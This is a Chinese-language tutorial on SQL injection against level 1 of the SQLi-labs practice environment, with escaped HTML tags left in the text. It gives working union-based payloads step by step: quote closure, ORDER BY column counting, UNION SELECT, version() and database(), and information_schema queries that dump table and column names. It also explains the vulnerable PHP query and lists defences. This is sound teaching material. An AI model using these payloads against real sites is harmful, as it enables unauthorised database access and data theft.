访问URL：

http:\/\/192.168.128.132\/sqlilabs\/less-1\/<\/code><\/li>

测试参数：?id=1<\/code>和?id=2<\/code>都能正常返回不同结果<\/li>

结论：id参数被代入SQL执行，存在注入点<\/li>
<\/ul>
2. 判断注入类型<\/h3>

测试字符型注入<\/strong>：

访问：?id=1'<\/code> → 页面报错<\/li>
访问：?id=1' --+<\/code> → 页面正常显示<\/li>
<\/ul>
<\/li>
结论<\/strong>：存在字符型注入

--+<\/code>被浏览器转换为-- <\/code>(注释符)<\/li>
单引号与源码中的引号形成闭合<\/li>
<\/ul>
<\/li>
<\/ul>
3. 确定列数<\/h3>

使用order by<\/code>子句：

?id=1' order by 4--+<\/code> → 报错"unknown column 4"<\/li>
?id=1' order by 3--+<\/code> → 正常显示<\/li>
<\/ul>
<\/li>
结论<\/strong>：表中共有3列<\/li>
<\/ul>
4. 确定显示位<\/h3>

使用联合查询：

?id=-1' union select 1,2,3--+<\/code><\/li>
结果显示2和3 → 第2、3列为显示位<\/li>
<\/ul>
<\/li>
技巧<\/strong>：使用负值或不存在值使前查询无结果<\/li>
<\/ul>
5. 获取数据库信息<\/h3>

版本信息：?id=-2' union select 1,version(),database()--+<\/code>

version()<\/code>：数据库版本<\/li>
database()<\/code>：当前数据库名(本例为"security")<\/li>
<\/ul>
<\/li>
<\/ul>
6. 爆破表名<\/h3>

利用information_schema数据库：

?id=-1' union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema="security")--+<\/code><\/li>
group_concat()<\/code>：将多行结果合并为字符串<\/li>
结果：显示security库中的所有表名<\/li>
<\/ul>
<\/li>
<\/ul>
7. 爆破字段名<\/h3>

针对users表：

?id=-1' union select 1,2,(select group_concat(column_name) from information_schema.columns where table_schema="security" and table_name="users")--+<\/code><\/li>
结果：显示users表的所有字段名<\/li>
<\/ul>
<\/li>
<\/ul>
三、技术原理分析<\/h2>
1. 源码分析<\/h3>
$sql =<\/span> "SELECT * FROM users WHERE id='<\/span>$id<\/span>' LIMIT 0,1"<\/span>;
<\/span><\/span><\/code><\/pre>
PHP双引号字符串会解析$id<\/code>变量<\/li>
注入构造：

正常：id=1<\/code> → WHERE id='1'<\/code><\/li>
注入：id=1' --+<\/code> → WHERE id='1' -- ' LIMIT...<\/code><\/li>
-- <\/code>注释掉后续语句<\/li>
<\/ul>
<\/li>
<\/ul>
2. 关键函数<\/h3>

concat()<\/code>：单行多列拼接<\/li>
group_concat()<\/code>：多行单列拼接<\/li>
version()<\/code>\/database()<\/code>：系统信息函数<\/li>
<\/ul>
3. information_schema结构<\/h3>

tables<\/code>表：

table_schema：数据库名<\/li>
table_name：表名<\/li>
<\/ul>
<\/li>
columns<\/code>表：

table_schema：数据库名<\/li>
table_name：表名<\/li>
column_name：字段名<\/li>
<\/ul>
<\/li>
<\/ul>
四、注意事项<\/h2>


URL编码：<\/p>

+<\/code>会被浏览器转换为空格<\/li>
特殊字符需要URL编码<\/li>
<\/ul>
<\/li>

PHP字符串处理：<\/p>

双引号字符串会解析变量<\/li>
单引号字符串保持原样<\/li>
<\/ul>
<\/li>

MySQL注释：<\/p>

-- <\/code>必须带空格<\/li>
#<\/code>也可作为注释符<\/li>
<\/ul>
<\/li>

闭合技巧：<\/p>

字符型注入需要闭合引号<\/li>
数值型注入可直接注入<\/li>
<\/ul>
<\/li>
<\/ol>
五、防御建议<\/h2>

使用预处理语句<\/li>
对输入进行严格过滤<\/li>
最小权限原则<\/li>
关闭错误回显<\/li>
使用WAF防护<\/li>
<\/ol>
通过本教程，您已掌握基本的SQL注入检测方法和利用技术，后续可继续研究其他类型的SQL注入和高级利用技术。<\/p>

SQL注入基础教程：基于SQLi-labs的第一关实战<\/h1>

二、第一关注入实战<\/h2>

三、技术原理分析<\/h2>